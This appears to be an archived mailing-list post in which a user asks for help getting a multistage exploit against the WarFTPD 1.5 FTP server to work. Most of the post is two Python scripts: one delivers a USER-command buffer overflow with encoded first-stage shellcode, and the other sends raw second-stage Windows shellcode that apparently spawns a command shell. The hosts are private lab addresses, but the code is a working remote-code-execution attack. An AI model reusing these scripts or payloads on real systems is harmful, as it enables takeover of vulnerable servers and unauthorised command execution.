Building multistage payloaded exploits?

[j_fast_and_the_furious at hotmail.com (scotty to hotty)]

ok, HD i've been hard at work trying to understand how the multistage payload works, but no luck.... so i've decided to 
post what ive got so far.... well ill first explain what im doing step by step.... first i launch the first script 
witch works perfectly (it has stage one of shellcode) next i have a second python script witch connects to the first 
staged code to send the second stage of the exploit.

first stage python script:

#!/usr/bin/python
import socket

# bad chars "\x0d\x16\xe2

sc = ("\x89\xe5\xdd\xc7\xd9\x75\xf4\x5e\x56\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x4b\x4c\x42\x4a\x4a\x4b\x51\x57\x4d\x38\x4c\x39\x4b\x4f\x4b"
"\x4f\x4b\x4f\x43\x50\x50\x31\x49\x4b\x4c\x4b\x43\x4d\x47\x4c"
"\x4c\x4b\x43\x4c\x47\x4d\x43\x48\x45\x51\x4a\x4f\x4c\x4b\x46"
"\x37\x51\x30\x43\x31\x4b\x5a\x4c\x4b\x46\x54\x4c\x5a\x45\x51"
"\x4a\x4e\x50\x31\x49\x50\x4c\x59\x4e\x4c\x49\x51\x49\x5a\x44"
"\x4d\x45\x51\x49\x52\x4b\x34\x49\x50\x42\x55\x4a\x56\x51\x53"
"\x42\x46\x46\x59\x48\x4a\x43\x45\x4a\x43\x50\x4b\x4c\x4b\x50"
"\x4f\x47\x54\x43\x31\x4d\x39\x45\x36\x4c\x4b\x45\x4c\x50\x59"
"\x4c\x4b\x50\x4f\x45\x4c\x43\x31\x4a\x49\x43\x33\x46\x4c\x4c"
"\x59\x4c\x49\x42\x4c\x51\x34\x45\x4c\x43\x51\x4b\x4f\x4d\x30"
"\x50\x31\x49\x4b\x42\x44\x4c\x4b\x51\x53\x46\x50\x4c\x4b\x51"
"\x50\x44\x4c\x4c\x4b\x42\x50\x45\x4c\x4e\x4d\x4c\x4b\x45\x38"
"\x44\x48\x51\x4e\x45\x36\x46\x33\x43\x56\x42\x48\x47\x43\x46"
"\x52\x45\x38\x43\x47\x42\x53\x47\x42\x51\x4f\x50\x54\x43\x56"
"\x4e\x59\x42\x52\x45\x30\x4b\x4f\x48\x56\x4c\x55\x50\x53\x46"
"\x33\x46\x33\x46\x33\x50\x53\x51\x53\x50\x53\x51\x53\x51\x43"
"\x4b\x39\x4a\x47\x43\x56\x4b\x31\x4a\x4f\x44\x48\x45\x52\x50"
"\x57\x51\x43\x45\x36\x4e\x59\x4a\x47\x49\x4f\x4b\x4f\x4e\x36"
"\x42\x46\x4e\x59\x4e\x48\x42\x4f\x4b\x4f\x49\x46\x4c\x57\x45"
"\x36\x45\x38\x46\x50\x46\x59\x43\x56\x50\x53\x4b\x39\x4d\x31"
"\x43\x5a\x44\x50\x46\x31\x50\x57\x42\x46\x4e\x59\x4d\x50\x47"
"\x4b\x4b\x4f\x48\x56\x46\x33\x46\x37\x43\x56\x4e\x59\x42\x55"
"\x51\x59\x4b\x4f\x49\x46\x50\x54\x46\x34\x46\x34\x51\x47\x45"
"\x36\x4e\x59\x50\x32\x50\x4c\x4b\x4f\x48\x56\x4d\x47\x50\x50"
"\x42\x46\x4e\x59\x50\x33\x48\x4e\x4b\x4f\x48\x56\x4b\x39\x4b"
"\x51\x50\x50\x48\x34\x44\x4c\x46\x30\x46\x31\x46\x37\x50\x51"
"\x43\x56\x48\x39\x49\x50\x47\x48\x4b\x4f\x4b\x56\x44\x4a\x41"
"\x41")

#"\xed\x1e\x94\x7c" -> matt wholers computer

buffer= "A" * 485 + "\x4a\x75\xd4\x77" + "\x90" * 100 + sc + "\r\n"


        

        
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('192.168.0.108',21))
s.recv(1024)
s.send("USER " + buffer + '\r\n')
#s.recv(1024)
#s.send(sc + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
s.close()
 

Second stage python script:#!/usr/bin/python
import socket
buffer = ("\x68\x33\x32\x00\x00\x68\x57\x53\x32\x5f\x57\xfc\xe8\x4c\x00"
"\x00\x00\x60\x8b\x6c\x24\x28\x8b\x45\x3c\x8b\x7c\x05\x78\x01"
"\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\xe3\x30\x49\x8b\x34\x8b"
"\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2"
"\xeb\xf4\x3b\x54\x24\x24\x75\xe3\x8b\x5f\x24\x01\xeb\x66\x8b"
"\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
"\xc2\x08\x00\x6a\x30\x59\x64\x8b\x31\x8b\x76\x0c\x8b\x76\x1c"
"\xad\x8b\x58\x08\x5e\x53\x68\x8e\x4e\x0e\xec\xff\xd6\x97\x53"
"\x56\x57\x8d\x44\x24\x10\x50\xff\xd7\x50\x50\x50\x68\xb6\x19"
"\x18\xe7\xff\xd6\x97\x68\xa4\x19\x70\xe9\xff\xd6\x95\x68\x08"
"\x92\xe2\xed\xff\xd6\x50\x57\x55\x83\xec\x10\x89\xe5\x89\xee"
"\x6a\x01\x6a\x00\x6a\x0c\x89\xe1\x6a\x00\x51\x56\xad\x56\x53"
"\x68\x80\x8f\x0c\x17\xff\x55\x20\x89\xc7\xff\xd0\x89\xe0\x6a"
"\x00\x50\x8d\x75\x08\x56\x8d\x75\x0c\x56\xff\xd7\x68\x43\x4d"
"\x44\x00\x89\xe2\x31\xc0\x8d\x7a\xac\x6a\x15\x59\xf3\xab\x83"
"\xec\x54\xc6\x42\xbc\x44\x66\xc7\x42\xe8\x01\x01\x8b\x75\x08"
"\x89\x72\xfc\x89\x72\xf8\x8b\x75\x04\x89\x72\xf4\x8d\x42\xbc"
"\x54\x50\x51\x51\x51\x41\x51\x49\x51\x51\x52\x51\x53\x68\x72"
"\xfe\xb3\x16\xff\x55\x20\xff\xd0\x31\xc0\xb4\x04\x96\x29\xf4"
"\x89\xe7\x6a\x64\x53\x68\xb0\x49\x2d\xdb\xff\x55\x20\xff\xd0"
"\x31\xc0\x50\x57\x50\x50\x50\xff\x75\x0c\x53\x68\x11\xc4\x07"
"\xb4\xff\x55\x20\xff\xd0\x85\xc0\x74\x74\x31\xc0\x3b\x07\x74"
"\x36\xe8\x77\x00\x00\x00\x50\x89\xe1\x50\x51\x56\x57\xff\x75"
"\x0c\x53\x68\x16\x65\xfa\x10\xff\x55\x20\xff\xd0\x85\xc0\x74"
"\x50\x31\xc0\x59\x39\xc8\x74\x11\x50\x51\x57\xff\x75\x28\xff"
"\x55\x10\x31\xc9\x39\xc8\x7c\x3a\xeb\xab\x89\xe0\xe8\x3f\x00"
"\x00\x00\x31\xc0\x50\x56\x57\xff\x75\x28\xff\x55\x14\x31\xc9"
"\x39\xc8\x7c\x86\x74\x1e\x51\x89\xe2\x51\x52\x50\x57\xff\x75"
"\x00\x53\x68\x1f\x79\x0a\xe8\xff\x55\x20\xff\xd0\x85\xc0\x74"
"\x05\x31\xc0\x59\xeb\xc8\x53\x68\xf0\x8a\x04\x5f\xff\x55\x20"
"\x31\xc9\x51\xff\xd0\x50\x54\x68\x7e\x66\x04\x80\xff\x75\x28"
"\xff\x55\x18\x85\xc0\x58\x75\xe0\xc3")
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('192.168.0.108',12345))
s.recv(1024)
s.send(buffer)
#s.recv(1024)
#s.send(sc)
s.recv(1024)
s.close()
 

i know that the first stage shellcode works its just second stage that doesnt seem to... on the program im exploiting i 
have ollydbg monitoring for any flagged errors. and it only trips when i send second stage.... anyway you can tell me 
what im doing wrong?.... anyways... thats my exact script... and if you want to know what prog im exploiting, its 
warftpd v1.5 ..... so far i have all single stage exploits to work but no luck on getting the multistaged ones to work.


_________________________________________________________________
Invite your mail contacts to join your friends list with Windows Live Spaces. It's easy!
http://spaces.live.com/spacesapi.aspx?wx_action=create&wx_url=/friends.aspx&mkt=en-us